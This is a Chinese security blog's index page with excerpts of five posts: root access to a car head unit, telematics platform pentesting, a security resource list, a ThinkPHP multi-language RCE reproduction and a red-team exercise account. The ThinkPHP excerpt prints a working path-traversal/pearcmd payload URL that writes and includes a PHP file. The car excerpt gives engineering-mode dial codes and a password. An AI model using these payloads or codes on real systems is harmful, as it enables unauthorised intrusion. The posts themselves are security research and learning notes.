Hacked某安汽车车机系统

很久之前尝试对某安汽车的车机系统进行渗透测试,但是却卡在入口无法进入,尝试暴力破解但是字典不够强大,没能成功。前段时间看到了绿盟科技博客的《新型车机,如何攻防?》感觉有点熟悉,再次探索发现可以获得车机系统root权限,遂事后诸葛亮一波,就当是学习笔记了。通过在论坛、QQ群、贴吧收集到这款车型进入工程模式的方法,在拨号键盘输入##888,然后点击拨号,如图:进入密码认证界面,输入收集到的密码:369

- 阅读全文 -

TSP平台渗透测试初探

1.车联网网络架构简介车联网的网络架构通常包括四层,分别是感知层、传输层、平台层和应用层。感知层是车联网的最底层,也是最靠近车辆的一层。它包括车辆上的各种传感器和执行器,例如GPS定位器、车载通信模块、摄像头、雷达、惯性传感器、轮速传感器等等,这些设备可以收集车辆的状态信息、位置信息等数据。 传输层是车联网的数据传输层,负责将感知层收集到的数据传输到平台层进行处理。传输层一般使用无线网络进行通信,

- 阅读全文 -

不收藏一定会后悔的11个国外网络安全资源

0dayTodayhttps://0day.today/号称世界上最大的漏洞利用数据库Packetstormhttps://packetstormsecurity.com/不用过多介绍,强大的漏洞库和情报Deepquest's BlogDeepquest的个人博客,包含新漏洞信息和情报https://deepquest.code511.com/blog/Cxsecurityhttps://cxse

- 阅读全文 -

【漏洞复现】ThinkPHP 多语言模块RCE

Exp# 写文件 http://172.17.0.2/public/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?=phpinfo()?>+/tmp/hello.php # 包含文件 http://172.17.0.2/public/index.p

- 阅读全文 -

记某次攻防演习和蓝队的博弈

外网打点访问目标网站发现是统一登录认证,子域名枚举发现存在oa、erp、mail等。其中一个存在Shiro反序列化漏洞,直接上工具:检测发现存在Shiro反序列化漏洞key,但是未找到利用链。奇怪,换个工具再试,成功Getshell,如图:root到手了,还得是飞鸿啊,吃个肉夹馍压压惊。你以为这就结束了?其实这才是刚刚开始,由于该服务器不出网,无法反弹shell,为了方便管理还是使用Webshel

- 阅读全文 -